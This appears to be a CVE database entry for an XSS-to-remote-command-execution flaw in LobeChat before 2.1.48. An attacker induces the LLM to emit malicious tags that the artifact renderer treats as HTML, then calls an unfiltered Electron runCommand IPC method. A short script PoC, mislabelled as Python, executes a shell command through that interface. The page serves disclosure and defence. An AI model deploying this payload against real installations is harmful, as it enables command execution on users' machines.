CVE-2026-42045

Description

LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat's Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user's privileges. This vulnerability is fixed in 2.1.48.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LobeChat < 2.1.48

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2026-42045: XSS to RCE via Electron IPC -->
<!-- Inject this payload via LLM output -->
<script>
    // Attempt to access the exposed Electron API
    if (window.parent && window.parent.electronAPI) {
        const ipc = window.parent.electronAPI;
        
        // Check if the vulnerable runCommand method exists
        if (ipc.runCommand) {
            // Execute arbitrary command (e.g., 'whoami' or 'calc.exe')
            ipc.runCommand('whoami > /tmp/pwned.txt');
            console.log("[+] Command executed successfully via IPC.");
        } else {
            console.log("[-] runCommand interface not found.");
        }
    } else {
        console.log("[-] electronAPI not accessible.");
    }
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42045
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42045
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42045/
[4] VulDB https://vuldb.com/cve/CVE-2026-42045
[5] https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq
[6] https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42045", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:23.637", "lastModified": "2026-05-13T18:23:27.920", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat's Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user's privileges. This vulnerability is fixed in 2.1.48."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq", "source": "[email protected]"}, {"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}